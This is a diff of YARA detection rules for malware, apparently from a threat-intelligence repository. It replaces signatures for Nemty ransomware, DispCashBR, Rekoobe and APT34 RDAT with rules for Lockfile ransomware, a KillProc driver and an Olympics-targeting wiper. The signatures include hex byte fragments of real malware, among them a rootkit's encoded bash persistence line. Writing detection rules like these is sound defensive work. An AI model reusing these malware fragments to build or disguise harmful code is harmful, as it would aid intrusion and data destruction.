-		$s9 = { 33 d2 33 c9 41 b8 00 00 00 80 ff 15 ba 33 00 00 41 b8 01 00 00 00 48 8d 15 7d 3b 00 00 48 8b c8 48 8b d8 ff 15 d9 33 00 00 48 8b cb 48 8b f8 ff 15 8d 33 00 00 4c 8d 4c 24 20 89 74 24 20 45 33 c0 33 d2 48 8b cf ff 15 ae 33 00 00 8b 5c 24 20 ff 15 64 34 00 00 44 8b c3 ba 0c 00 00 00 48 8b c8 ff 15 33 34 00 00 44 8b 44 24 20 4c 8d 4c 24 20 48 8b d0 48 8b cf 48 8b d8 ff 15 7a 33 00 00 4c 8b 43 10 48 8d 4c 24 30 ba 04 01 00 00 ff 15 46 37 00 00 ff 15 20 34 00 00 4c 8b c3 33 d2 48 8b c8 ff 15 9a 33 00 00 48 8b cf ff 15 11 33 00 00 48 8d 4c 24 30 8b fe ff 15 a4 33 00 00 83 e8 02 }
+		$seq1 = { 73 ?? 00 00 0a 13 ?? 11 ?? 72 [2] 00 70 6f ?? 00 00 0a 00 11 ?? 72 [2] 00 70 11 ?? 72 [2] 00 70 28 ?? 00 00 0a 6f ?? 00 00 0a 00 11 ?? 17 6f ?? 00 00 0a 00 11 ?? 28 ?? 00 00 0a 26 }
+		$seq2 = { 1b 8d 0e 00 00 01 13 ?? 11 ?? 16 72 a1 03 00 70 a2 11 ?? 17 08 a2 11 ?? 18 72 53 03 00 70 a2 11 ?? 19 11 ?? a2 11 ?? 1a 72 e7 03 00 70 a2 11 ?? 28 47 00 00 0a 13 0a }
+		$seq3 = { 02 73 ?? 00 00 0a 28 ?? 00 00 0a 74 2a 00 00 01 [2-4] 72 65 01 00 70 6f ?? 00 00 0a 00 [1-2] 72 65 01 00 70 6f ?? 00 00 0a 00 [1-2] 72 87 01 00 70 6f ?? 00 00 0a 00 03 [1-2] 73 ?? 00 00 0a 13 }
+		$seq4 = { 1f 0f 8d ?? 00 00 01 13 ?? 11 ?? 16 72 ?? ?? 00 70 a2 11 ?? 17 [1-2] a2 11 ?? 18 72 [2] 00 70 a2 11 ?? 19 28 ?? 00 00 06 a2 11 ?? 1a 72 ?? ?? 00 70 a2 11 ?? 1b 28 ?? 00 00 06 a2 11 ?? 1c 72 ?? ?? 00 70 a2 11 ?? 1d 28 ?? 00 00 06 2d 07 72 ?? ?? 00 70 2b 05 72 ?? ?? 00 70 a2 11 ?? 1e 72 ?? ?? 00 70 a2 11 ?? 1f 09 28 ?? 00 00 06 2d 07 72 ?? ?? 00 70 2b 05 72 ?? ?? 00 70 a2 11 ?? 1f 0a 72 [2] 00 70 a2 11 ?? 1f 0b [1-2] 7b 01 00 00 04 a2 11 ?? 1f 0c 72 [2] 00 70 a2 11 ?? 1f 0d 28 ?? 00 00 06 a2 11 ?? 1f 0e 72 [2] 00 70 a2 11 ?? 28 ?? 00 00 0a 13 }
+		$seq5 = { 1f ?? 8d ?? 00 00 01 13 ?? 11 ?? 16 72 91 01 00 70 a2 11 ?? 17 1a 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 68 9d 11 ?? 17 1f 77 9d 11 ?? 18 1f 69 9d 11 ?? 19 1f 64 9d 11 ?? 28 ?? 00 00 06 a2 11 ?? 18 72 b7 01 00 70 a2 11 ?? 19 ?? [0-1] a2 11 ?? 1a 72 bf 01 00 70 a2 11 ?? 1b 28 ?? 00 00 06 a2 11 ?? 1c 72 db 01 00 70 a2 11 ?? 1d 28 ?? 00 00 06 a2 11 ?? 1e 72 f7 01 00 70 a2 11 ?? 1f 09 28 ?? 00 00 06 2d 07 72 0d 02 00 70 2b 05 72 15 02 00 70 a2 11 ?? 1f 0a 72 1d 02 00 70 a2 11 ?? 1f 0b 28 ?? 00 00 06 2d 07 72 37 02 00 70 2b 05 72 41 02 00 70 a2 11 ?? 1f 0c 72 4d 02 00 70 a2 11 ?? 1f 0d ?? 7b ?? 00 00 04 a2 11 ?? 1f 0e 72 69 02 00 70 a2 11 ?? 1f 0f 1f 09 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 77 9d 11 ?? 17 1f 6f 9d 11 ?? 18 1f 72 9d 11 ?? 19 1f 6b 9d 11 ?? 1a 1f 67 9d 11 ?? 1b 1f 72 9d 11 ?? 1c 1f 6f 9d 11 ?? 1d 1f 75 9d 11 ?? 1e 1f 70 9d 11 ?? 28 ?? 00 00 06 a2 11 ?? 1f 10 72 b7 01 00 70 a2 11 ?? 1f 11 28 ?? 00 00 06 a2 11 ?? 1f 12 72 71 02 00 70 a2 11 ?? 1f 13 1f 14 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 77 9d 11 ?? 17 1f 69 9d 11 ?? 18 1f 6e 9d 11 ?? 19 1f 33 9d 11 ?? 1a 1f 32 9d 11 ?? 1b 1f 5f 9d 11 ?? 1c 1f 63 9d 11 ?? 1d 1f 6f 9d 11 ?? 1e 1f 6d 9d 11 ?? 1f 09 1f 70 9d 11 ?? 1f 0a 1f 75 9d 11 ?? 1f 0b 1f 74 9d 11 ?? 1f 0c 1f 65 9d 11 ?? 1f 0d 1f 72 9d 11 ?? 1f 0e 1f 73 9d 11 ?? 1f 0f 1f 79 9d 11 ?? 1f 10 1f 73 9d 11 ?? 1f 11 1f 74 9d 11 ?? 1f 12 1f 65 9d 11 ?? 1f 13 1f 6d 9d 11 ?? 28 ?? 00 00 06 1c 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 64 9d 11 ?? 17 1f 6f 9d 11 ?? 18 1f 6d 9d 11 ?? 19 1f 61 9d 11 ?? 1a 1f 69 9d 11 ?? 1b 1f 6e 9d 11 ?? 28 ?? 00 00 06 28 ?? 00 00 06 a2 11 ?? 1f 14 72 69 02 00 70 a2 11 ?? 1f 15 19 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 64 9d 11 ?? 17 1f 6e 9d 11 ?? 18 1f 73 9d 11 ?? 28 ?? 00 00 06 a2 11 ?? 1f 16 72 79 02 00 70 a2 11 ?? 1f 17 1f 14 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 77 9d 11 ?? 17 1f 69 9d 11 ?? 18 1f 6e 9d 11 ?? 19 1f 33 9d 11 ?? 1a 1f 32 9d 11 ?? 1b 1f 5f 9d 11 ?? 1c 1f 63 9d 11 ?? 1d 1f 6f 9d 11 ?? 1e 1f 6d 9d 11 ?? 1f 09 1f 70 9d 11 ?? 1f 0a 1f 75 9d 11 ?? 1f 0b 1f 74 9d 11 ?? 1f 0c 1f 65 9d 11 ?? 1f 0d 1f 72 9d 11 ?? 1f 0e 1f 73 9d 11 ?? 1f 0f 1f 79 9d 11 ?? 1f 10 1f 73 9d 11 ?? 1f 11 1f 74 9d 11 ?? 1f 12 1f 65 9d 11 ?? 1f 13 1f 6d 9d 11 ?? 28 ?? 00 00 06 1f 0c 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 70 9d 11 ?? 17 1f 61 9d 11 ?? 18 1f 72 9d 11 ?? 19 1f 74 9d 11 ?? 1a 1f 6f 9d 11 ?? 1b 1f 66 9d 11 ?? 1c 1f 64 9d 11 ?? 1d 1f 6f 9d 11 ?? 1e 1f 6d 9d 11 ?? 1f 09 1f 61 9d 11 ?? 1f 0a 1f 69 9d 11 ?? 1f 0b 1f 6e 9d 11 ?? 28 ?? 00 00 06 28 ?? 00 00 06 6f ?? 00 00 0a 72 7f 02 00 70 28 ?? 00 00 0a 2d 07 72 8b 02 00 70 2b 05 72 8f 02 00 70 a2 11 ?? 1f 18 }
+		$seq6 = { 13 30 02 00 2d 00 00 00 ?? 00 00 11 00 72 ?? ?? 00 70 28 ?? 00 00 0a 28 ?? 00 00 0a 73 ?? 00 00 0a 0a 06 72 ?? ?? 00 70 6f ?? 00 00 0a 0b 07 6f ?? 00 00 0a }
+		$seq7 = { 8d ?? 00 00 01 13 ?? 11 ?? 16 72 [2] 00 70 a2 11 ?? 17 [1-2] a2 11 ?? 18 72 [2] 00 70 a2 11 ?? 19 [2] a2 11 ?? 1a 72 [2] 00 70 a2 11 }
+		$seq8 = { 12 ?? 28 ?? 00 00 06 0f 00 28 ?? 00 00 06 d0 ?? 00 00 1b 28 ?? 00 00 0a 28 ?? 00 00 0a a5 ?? 00 00 1b [1-2] 2b 00 [1-2] 2a }
+		$seq9 = { 1f 10 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 47 9d 11 ?? 17 1f 65 9d 11 ?? 18 1f 74 9d 11 ?? 19 1f 54 9d 11 ?? 1a 1f 68 9d 11 ?? 1b 1f 72 9d 11 ?? 1c 1f 65 9d 11 ?? 1d 1f 61 9d 11 ?? 1e 1f 64 9d 11 ?? 1f 09 1f 43 9d 11 ?? 1f 0a 1f 6f 9d 11 ?? 1f 0b 1f 6e 9d 11 ?? 1f 0c 1f 74 9d 11 ?? 1f 0d 1f 65 9d 11 ?? 1f 0e 1f 78 9d 11 ?? 1f 0f 1f 74 9d 11 ?? 28 97 00 00 06 28 09 00 00 2b 13 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 25KB and 3 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 15KB and 3 of them
 }
-rule ARKBIRD_SOLG_RAN_Nemty_June_2021_1 : FILE
+rule ARKBIRD_SOLG_WIP_Unk_Wiper_July_2021_1 : FILE
 {
 	meta:
-		description = "Detect Nemty ransomware"
+		description = "Detect unknown wiper that focuses olympic games in Japan"
 		author = "Arkbird_SOLG"
-		id = "1c7994b8-7479-5679-91a5-e3ca4b2e7fde"
-		date = "2021-06-12"
-		modified = "2021-06-13"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-12/Nemty/RAN_Nemty_June_2021_1.yara#L1-L19"
+		id = "a03d558e-399a-506e-8f37-d4907cc68d54"
+		date = "2021-07-22"
+		modified = "2021-07-22"
+		reference = "https://www.mbsd.jp/research/20210721/blog/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-22/WIP_Unk_Wiper_July_2021_1.yara#L1-L29"
 		license_url = "N/A"
-		logic_hash = "25a9e82ae1e950e1c71d6dfa120efd1a2ba39cbf8e9c2cd4ba4e67ce7dabc45e"
+		logic_hash = "32f66fee2547ef33121620b822f86bfdf66ff337909a56aa4f0e8ef83b6d7730"
 		score = 75
-		quality = 75
+		quality = 40
 		tags = "FILE"
-		hash1 = "45e35c9b095871fbc9b85afff4e79dd36b7812b96a302e1ccc65ce7668667fe6"
+		hash1 = "295d0aa4bf13befebafd7f5717e7e4b3b41a2de5ef5123ee699d38745f39ca4f"
 		hash2 = "511fee839098dfa28dd859ffd3ece5148be13bfb83baa807ed7cac2200103390"
-		hash3 = "74b7a1da50ce44b640d84422bb3f99e2f338cc5d5be9ef5f1ad03c8e947296c3"
-		tlp = "white"
-		adversary = "RAAS"
+		tlp = "green"
+		adversary = "Olympic Destroyer ?"
 
 	strings:
-		$s1 = { 83 f8 1a 0f 8d [2] 00 00 [0-1] 89 4c 24 [1-2] 89 54 24 [1-2] 89 ?? 24 [1-15] 00 00 00}
-		$s2 = { 5a 4c 49 42 00 00 00 00 00 00 01 ?? 78 01 54 8f [3] 40 [2] cf }
-		$s3 = { 4c 24 [1-2] 89 54 24 [1-2] 89 ?? 24 [12-25] 00 81 }
-		$s4 = { ff ff [0-1] 8d 05 [3] 00 [0-1] 89 04 24 [0-1] c7 44 24 ?? 02 00 00 00 e8 [2] ff ff e8 [2] ff ff [0-1] 8b 4c 24 }
+		$s1 = "\\\\.\\Global\\ProcmonDebugLogger" fullword ascii
+		$s2 = { 50 52 4f 43 4d 4f 4e 5f 57 49 4e 44 4f 57 5f 43 4c 41 53 53 00 00 00 00 4f 6c 6c 79 44 62 67 }
+		$s3 = { 8d 44 24 10 50 ff 15 08 30 40 00 50 ff 15 2c 30 40 00 83 7c 24 10 00 0f 85 76 02 00 00 33 c9 0f 1f }
+		$s4 = { 50 68 00 12 40 00 ff 15 60 30 40 00 85 c0 0f 85 ef 02 00 00 50 68 80 00 00 00 6a 03 50 6a 07 68 00 00 00 80 68 0c 32 40 00 ff 15 18 30 40 00 83 }
+		$s5 = { 8b 3d d0 30 40 00 88 84 0c e8 00 00 00 8d 84 24 e8 00 00 00 50 ff d7 83 c4 04 b0 9a 33 c9 0f 1f 00 f6 d0 88 84 0c b4 00 00 00 41 8a 81 30 32 40 }
+		$s6 = { 8b ec 83 ec 14 83 65 f4 00 8d 45 f4 83 65 f8 00 50 ff 15 34 30 40 00 8b 45 f8 33 45 f4 89 45 fc ff 15 38 30 40 00 31 45 fc ff 15 3c 30 40 00 31 45 fc 8d 45 ec 50 ff 15 40 30 40 00 8b 45 f0 8d 4d fc 33 45 ec 33 45 fc 33 }
+		$p1 = { 5c 2e 5c 47 6c 6f 62 61 6c 5c 35 84 44 65 62 75 67 4c 6f 67 67 3f }
+		$p2 = "UPX" fullword ascii
+		$p3 = { 45 6e 75 6d 57 69 6e 64 6f 77 73 }
+		$p4 = { 73 65 74 5f 6e 65 77 5f 6d 6f 64 65 00 00 00 5f 63 6f 6e 66 69 67 74 68 72 65 61 64 6c 6f 63 61 6c 65 }
+		$p5 = { 4e 75 74 6f 72 75 6e 2f 43 4e 65 74 }
+		$p6 = { 44 50 52 4f 43 4d 4f 4e 5f 57 49 4e 44 4f 57 5f 43 4c 41 53 53 }
+		$p7 = { 53 6d 61 72 74 53 6e 69 66 66 67 }
+		$p8 = { 26 30 30 63 66 67 }
+		$p9 = { 72 6f 63 65 94 48 61 63 6b }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 500KB and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 200KB and ( 5 of ( $s* ) or 7 of ( $p* ) )
 }
-rule ARKBIRD_SOLG_ATM_Dispcashbr_May_2021_1 : FILE
+rule ARKBIRD_SOLG_RAN_Lockfile_Packed_Aug_2021_1 : FILE
 {
 	meta:
-		description = "Detect the DispCashBR ATM malware"
+		description = "Detect lockfile ransomware (Packed version)"
 		author = "Arkbird_SOLG"
-		id = "629261d8-242c-580d-aa4d-4b313c77edef"
-		date = "2020-05-14"
-		modified = "2021-05-14"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-14/DispCashBR/ATM_DispCashBR_May_2021_1.yara#L1-L18"
+		id = "7c1631d0-5bec-5b44-b4b2-5ddf1dbd7222"
+		date = "2021-08-28"
+		modified = "2021-08-29"
+		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/RAN_Lockfile_Packed_Aug_2021_1.yara#L1-L18"
 		license_url = "N/A"
-		logic_hash = "26f641a266c1f187d834a05b327c13ddee93747e182a5458e4ec3cb1f23f5f47"
-		score = 75
+		logic_hash = "a52b2715d505a657c3cd7cd31efb47c16a0ec943a4e1b742bd3ec5c6e46495c9"
+		score = 50
 		quality = 75
 		tags = "FILE"
-		hash1 = "432f732a4ecbb86cb3dedbfa881f2733d20cbcc5958ead52823bf0967c133175"
-		hash2 = "7cea6510434f2c8f28c9dbada7973449bb1f844cfe589cdc103c9946c2673036"
-		tlp = "White"
-		adversary = "-"
+		hash1 = "2a23fac4cfa697cc738d633ec00f3fbe93ba22d2498f14dea08983026fdf128a"
+		hash2 = "bf315c9c064b887ee3276e1342d43637d8c0e067260946db45942f39b970d7ce"
+		level = "Experimental"
+		adversary = "Lockfile"
 
 	strings:
-		$seq1 = { c7 45 cc 00 00 00 00 c7 04 24 68 5d 40 00 e8 40 0e 00 00 8b 85 a0 fd ff ff 8b 40 0a 8b 40 03 89 44 24 04 c7 04 24 89 5d 40 00 e8 0c 0e 00 00 c7 04 24 a4 5d 40 00 e8 18 0e 00 00 8b 85 a0 fd ff ff 8b 40 0a 8b 40 03 01 45 cc c7 04 24 d0 07 00 00 e8 7d 0e 00 00 83 ec 04 8b 85 a0 fd ff ff 8d 48 0a 0f b7 85 be fd ff ff 0f b7 c0 8d 95 98 fd ff ff 89 54 24 10 c7 44 24 0c 00 00 00 00 89 4c 24 08 c7 44 24 04 2e 01 00 00 89 04 24 e8 75 05 00 00 83 ec 14 89 45 e8 8b 45 e8 83 c0 38 83 }
-		$seq2 = { 0f b7 85 be fd ff ff 0f b7 c0 8b 55 e4 89 54 24 08 c7 44 24 04 06 00 00 00 89 04 24 e8 7e 17 00 00 83 ec 0c 0f b7 85 be fd ff ff 0f b7 c0 8d 95 b8 fd ff ff 89 54 24 08 c7 44 24 04 00 00 00 00 89 04 24 e8 5f 17 00 00 83 ec 0c 0f b7 85 be fd ff ff 0f b7 c0 8d 95 26 fd ff ff 89 54 24 10 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 04 2e 01 00 00 89 04 24 e8 f8 16 00 00 83 ec 14 89 45 e0 8d 85 ac fd ff ff 89 44 24 08 c7 44 24 04 03 00 00 00 c7 04 24 04 00 00 00 e8 dc 16 00 00 83 ec 0c 8b 45 e0 83 c0 38 83 f8 }
-		$seq3 = { 8b 85 a8 fd ff ff 8b 50 14 8b 85 a8 fd ff ff 8b 40 10 0f af c2 89 45 d8 8b 45 d8 89 44 24 04 c7 04 24 04 5b 40 00 e8 aa 12 00 00 8b 85 a4 fd ff ff 0f b7 40 04 0f b7 c0 89 44 24 04 c7 04 24 24 5b 40 00 e8 8d 12 00 00 8b 85 a8 fd ff ff 8b 50 18 8b 85 a8 fd ff ff 8b 40 1c 0f af c2 89 45 d4 c7 45 f0 00 00 00 00 8b 45 d8 89 44 24 04 c7 04 24 45 5b 40 00 e8 5b 12 00 00 83 45 f0 01 83 7d f0 01 7e e3 8b 85 a0 fd ff ff c7 40 06 01 00 00 00 0f b7 85 be fd ff ff 0f b7 c0 8d 95 26 fd ff ff 89 54 24 10 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 04 2e 01 00 00 89 04 24 e8 60 ed ff ff 89 45 d0 }
-		$seq4 = { c7 45 ec 00 00 00 00 8d 85 c4 fd ff ff 89 44 24 04 c7 04 24 03 00 02 0b e8 47 1b 00 00 83 ec 08 89 45 e8 83 7d e8 00 74 18 c7 04 24 92 50 40 00 e8 8b 23 00 00 c7 04 24 ff ff ff ff e8 8f 23 00 00 c7 04 24 aa 50 40 00 e8 8b 23 00 00 c7 04 24 f5 ff ff ff e8 ef 23 00 00 83 ec 04 c7 44 24 04 03 00 00 00 89 04 24 e8 e4 23 00 00 83 ec 08 c7 04 24 b8 0b 00 00 e8 dd 23 00 00 83 ec 04 c7 04 24 c4 50 40 00 e8 4e 23 00 00 8d 85 c4 fd ff ff 83 c0 06 89 44 24 04 c7 04 24 ed 50 40 00 e8 1d 23 00 00 8d 85 c4 fd ff ff 05 07 01 00 00 89 44 24 04 c7 04 24 03 51 40 00 e8 02 23 00 00 0f b7 85 c8 fd ff ff 0f b7 c0 89 44 24 04 c7 04 24 1a 51 40 00 e8 e8 22 00 00 0f b7 85 c6 fd ff ff 0f b7 c0 89 44 24 04 c7 04 24 2f 51 40 00 e8 ce 22 00 00 0f b7 85 c4 fd ff ff 0f b7 c0 89 44 24 04 c7 04 24 42 51 40 00 e8 b4 22 00 00 c7 04 24 54 51 40 00 e8 c0 22 00 00 8d 85 c0 fd ff ff 89 04 24 e8 46 1a 00 00 83 ec 04 8b 85 c0 fd ff ff 8d 95 be fd ff ff 89 54 24 20 c7 44 24 1c 00 00 00 00 8d 95 c4 fd ff ff 89 54 24 18 c7 44 24 14 0f 00 02 0b c7 44 24 10 00 00 00 00 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 89 44 24 04 c7 04 24 7f 51 40 00 e8 f9 19 00 00 83 ec 24 89 45 e8 8b 45 e8 83 c0 36 83 f8 }
+		$s1 = { 90 03 ?? 40 58 4a bc 3c 64 e4 5d 2e 44 45 45 45 ?? 72 48 8e 45 45 43 45 [6] 08 f6 33 45 [5] 01 e9 e3 }
+		$s2 = { 5b 22 48 0f 5b 22 48 0f 5b 22 48 bb c7 d3 48 03 5b 22 48 bb c7 d1 48 97 5b 22 48 bb c7 d0 48 16 5b 22 48 69 34 df 48 0e 5b 22 48 5d 2e 26 49 1d 5b 22 48 5d 2e 21 49 05 5b 22 48 59 2e 27 49 28 5b 22 48 59 2e 21 49 0e 5b 22 48 5d 2e 27 49 58 5b 22 48 06 23 b1 48 02 5b 22 48 0f 5b 23 48 bf 5b 22 48 59 2e 2b 49 0d 5b 22 48 59 2e dd 48 0e 5b 22 48 59 2e 20 49 0e 5b 22 48 52 69 63 68 0f 5b 22 48 }
+		$s3 = { 44 fc 90 a9 [0-4] 1c 79 38 10 [0-4] 18 20 72 0e [2-5] 3f [0-4] 24 34 6c 05 fc [0-4] 23 40 }
+		$s4 = { c3 df [0-4] 10 4c c8 20 d3 55 56 57 41 54 41 55 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 20KB and 3 of ( $seq* )
+		uint16( 0 ) == 0x5a4d and filesize > 10KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_ELF_Rekoobe_Nov_2021_1 : FILE
+rule ARKBIRD_SOLG_RAN_Lockfile_Aug_2021_1 : FILE
 {
 	meta:
-		description = "Detect the Rekoobe rootkit"
+		description = "Detect Lockfile ransomware (unpacked version)"
 		author = "Arkbird_SOLG"
-		id = "a5b200f1-cbb7-5106-8127-74abd3cde061"
-		date = "2021-11-10"
-		modified = "2021-11-11"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-10/MAL_ELF_Rekoobe_Nov_2021_1.yara#L1-L20"
+		id = "4abe2e70-5df9-5c5c-ac11-0c958d5430b7"
+		date = "2021-08-28"
+		modified = "2021-08-29"
+		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/RAN_Lockfile_Aug_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "bde3d1a3d2d2e9efd4b7c68f69dce40d5e0f01d41885481730d8a7fa67cbab7e"
-		score = 75
-		quality = 73
+		logic_hash = "6fc04316b8b4790494a8c88c8435245a051b2757e5936a5ef95cae2f05907b63"
+		score = 50
+		quality = 75
 		tags = "FILE"
-		hash1 = "bf09a1a7896e05b18c033d2d62f70ea4cac85e2d72dbd8869e12b61571c0327e"
-		hash2 = "e1999a3e5a611312e16bb65bb5a880dfedbab8d4d2c0a5d3ed1ed926a3f63e94"
-		tlp = "white"
-		adversary = "-"
+		hash1 = "3303a19789a73fa70a107f8e35a4ce10bb4f6a69ac041a1947481ed8ae99a11c"
+		level = "experimental"
+		adversary = "Lockfile"
 
 	strings:
-		$s1 = { 00 ?? 19 00 00 00 48 85 c0 [2-6] bf 0a 00 00 00 e8 [2] 01 00 ?? 24 00 00 00 48 85 c0 [2-6] c6 00 48 c6 40 05 49 c6 40 01 49 c6 40 06 4c c6 40 02 53 c6 40 07 45 c6 40 03 54 c6 40 08 3d c6 40 04 46 c6 40 09 00 48 89 c7 e8 [2] 00 00 48 8d 54 24 0c }
-		$s2 = "GETCONF_DIR" ascii
-		$s3 = "/var/run/nscd/so/dev/ptmx" ascii
-		$s4 = { 45 78 65 63 53 74 61 72 74 3d 2f 62 69 6e 2f 62 61 73 68 20 2d 63 20 2f 75 73 72 2f 62 69 6e 2f 62 69 6f 73 65 74 64 }
-		$s5 = { 48 89 df e8 [3] ff 31 f6 48 89 df e8 [3] ff 48 8d 58 01 48 }
-		$s6 = { 2f 76 61 72 2f 74 6d 70 00 2f 76 61 72 2f 70 72 6f 66 69 6c 65 }
+		$s1 = { 80 32 41 48 8d 52 01 ff c1 81 f9 d1 57 00 00 72 ef 4c 8d 05 78 d4 06 00 33 d2 33 c9 ff 15 06 9a 05 00 48 8b d8 ff 15 0d 9a 05 00 48 8b cb 3d b7 00 00 00 75 14 ff 15 0d 9a 05 00 33 c0 48 81 c4 d0 03 00 00 41 5c 5b 5d c3 4c 89 b4 24 c8 03 00 00 4c 89 bc 24 c0 03 00 00 ff 15 e9 99 05 00 ff }
+		$s2 = "winsta0\\default" fullword ascii
+		$s3 = { 55 56 57 48 8d 6c 24 f0 48 81 ec 10 01 00 00 33 db 48 8b f1 48 89 5c 24 68 48 89 5d 40 48 89 5c 24 60 ff 15 0b a2 05 00 8b c8 89 45 38 48 8d 54 24 68 ff 15 1b a5 05 00 0f 57 c0 8d 7b 30 33 c0 48 89 45 00 48 89 45 98 48 8d 05 d4 db 06 00 0f 11 45 a0 c7 45 a0 68 00 00 00 0f 11 45 b0 48 89 45 b0 0f 11 45 c0 0f 11 45 d0 0f 11 45 e0 0f 11 45 f0 0f 11 45 88 ff 15 17 a2 05 00 4c 8d 44 24 60 ba eb 01 02 00 48 8b c8 ff 15 4c a1 05 00 85 c0 0f 84 10 01 00 00 4c 8d 44 24 70 33 c9 48 8d 15 8e db 06 00 ff 15 28 a1 05 00 85 c0 0f 84 f4 00 00 00 48 8b 44 24 70 44 8d 4b 01 48 8b 4c 24 60 45 33 c0 48 89 44 24 7c ba 00 00 00 02 48 8d 45 40 c7 44 24 78 01 00 00 00 48 89 44 24 28 c7 44 24 20 01 00 00 00 c7 45 84 02 00 00 00 ff 15 ef a0 05 00 85 }
+		$s4 = { 48 8d 85 18 03 00 00 40 88 74 24 53 48 89 44 24 30 4c 8d 4c 24 44 48 8b 05 57 04 0c 00 48 8d 15 f0 dd 06 00 48 89 44 24 28 48 8d 8d d0 01 00 00 48 8d 45 b0 4c 8b c3 48 89 44 24 20 e8 13 f3 ff ff 48 89 74 24 30 48 8d 8d d0 01 00 00 c7 44 24 28 80 00 00 00 45 33 c9 45 33 c0 c7 44 24 20 02 00 00 00 ba 00 00 00 c0 ff 15 a6 a3 05 00 44 8b 05 8f fe 07 00 48 8d 4d 88 48 8b f8 e8 23 b5 ff ff 48 83 }
+		$s5 = { 3c 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3e 25 73 3c 2f 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3e 00 3c 62 6c 6f 63 6b 6e 75 6d 3e 25 64 3c 2f 62 6c 6f 63 6b 6e 75 6d 3e 00 25 73 5c 25 73 2d 25 73 2d 25 64 25 73 }
+		$s6 = { 33 d2 48 8d 8d c0 00 00 00 41 b8 04 01 00 00 e8 48 99 03 00 48 8d 95 10 03 00 00 c7 85 10 03 00 00 04 01 00 00 48 8d 4d b0 ff 15 c5 a5 05 00 4c 8d 45 b0 48 8d 15 2a df 06 00 48 8d 8d c0 00 00 00 e8 96 f4 ff ff 44 8d 46 02 48 8d 15 33 df 06 00 48 8d 4c 24 68 e8 81 f4 ff ff c6 85 18 03 00 00 2f 8b ce c6 85 19 03 00 00 69 c6 85 1a 03 00 00 75 c6 85 1b 03 00 00 62 40 88 b5 1c 03 00 00 0f b6 }
 
 	condition:
-		uint32( 0 ) == 0x464C457F and filesize > 100KB and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 10KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_APT34_RDAT_July_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Killproc_Aug_2021_1 : FILE
 {
 	meta:
-		description = "Detect RDAT used by APT34"
+		description = "Detect KillProc driver used by Night Dragon for kill process before encryption"
 		author = "Arkbird_SOLG"
-		id = "136f8a9e-e680-5fab-8113-b4d33a47bc34"
-		date = "2021-07-15"
-		modified = "2021-07-16"
-		reference = "https://twitter.com/ShadowChasing1/status/1415206437806960647"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-15/APT34/APT_APT34_RDAT_July_2021_1.yara#L1-L22"
+		id = "b0d6a21d-f451-58c9-b640-ad57feec7c38"
+		date = "2021-08-27"
+		modified = "2021-08-29"
+		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/MAL_KillProc_Aug_2021_1.yara#L1-L21"
 		license_url = "N/A"
-		logic_hash = "269788430ca8faff4b0ea5ec7c2a62f99f5f48ef3bc4ea3f7a27f1d735e64819"
+		logic_hash = "d24634e7719e3b6be3322b07c3e754e8c1275c73102c6d7f8d9abaae9887a0da"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "b59dea96ef94e8d32ee1a1805174318643569bbdca0d7569ede19467ff09dcdc"
-		hash2 = "65a6afc027ff851bd325d8a4f2ab4f326dd8f2c230bfd49a213c5afc00df8e2c"
-		hash3 = "f9f6dbb09773f708b125a4cca509047eb33c8c53d9e15a8c41ae3d7a8c3e5c7c"
-		tlp = "White"
-		adversary = "APT34"
+		hash1 = "36e8bb8719a619b78862907fd49445750371f40945fefd55a9862465dc2930f9"
+		adversary = "Lockfile"
 
 	strings:
-		$s1 = { 0a 6f 70 74 20 25 6c 75 28 25 6c 75 29 20 73 74 61 74 20 25 6c 75 28 25 6c 75 29 20 73 74 6f 72 65 64 20 25 6c 75 20 6c 69 74 20 25 75 20 64 69 73 74 20 25 75 }
